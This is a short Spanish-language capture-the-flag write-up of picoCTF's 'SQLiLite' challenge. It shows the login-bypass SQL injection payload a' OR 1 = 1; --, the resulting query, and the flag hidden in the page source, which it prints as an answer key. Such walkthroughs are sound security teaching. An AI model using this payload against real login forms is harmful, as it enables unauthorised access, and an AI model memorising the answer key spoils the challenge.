SQLiLite
SQLiLite Author: Mubarak Mikail Description Can you login to this website? Try to login here.
Nada más abramos la instancia, y carguemos la página web veremos el típico formulario de login, las pistas dicen que el usuario es admin. ¿Probamos con alguna inyección SQL como vimos anteriormente? picoctf-moresqli
a’ OR 1 = 1; –
1
2
3
4
5
username: admin
password: a' OR 1 = 1; --
SQL query: SELECT * FROM users WHERE name='admin' AND password='a' OR 1 = 1; --'
Logged in! But can you see the flag, it is in plainsight.
Efectivamente funciona pero no podemos ver la flag. Procedo a ver el código fuente de la página a la que hemos accedido y voilá.
1
2
3
4
<pre>username: admin
password: a' OR 1 = 1; --
SQL query: SELECT * FROM users WHERE name='admin' AND password='a' OR 1 = 1; --'
</pre><h1>Logged in! But can you see the flag, it is in plainsight.</h1><p hidden>Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21}</p>
flag: picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21}
De nuevo SQLi, casi una repeteción.
Esta entrada está licenciada bajo CC BY 4.0 por el autor.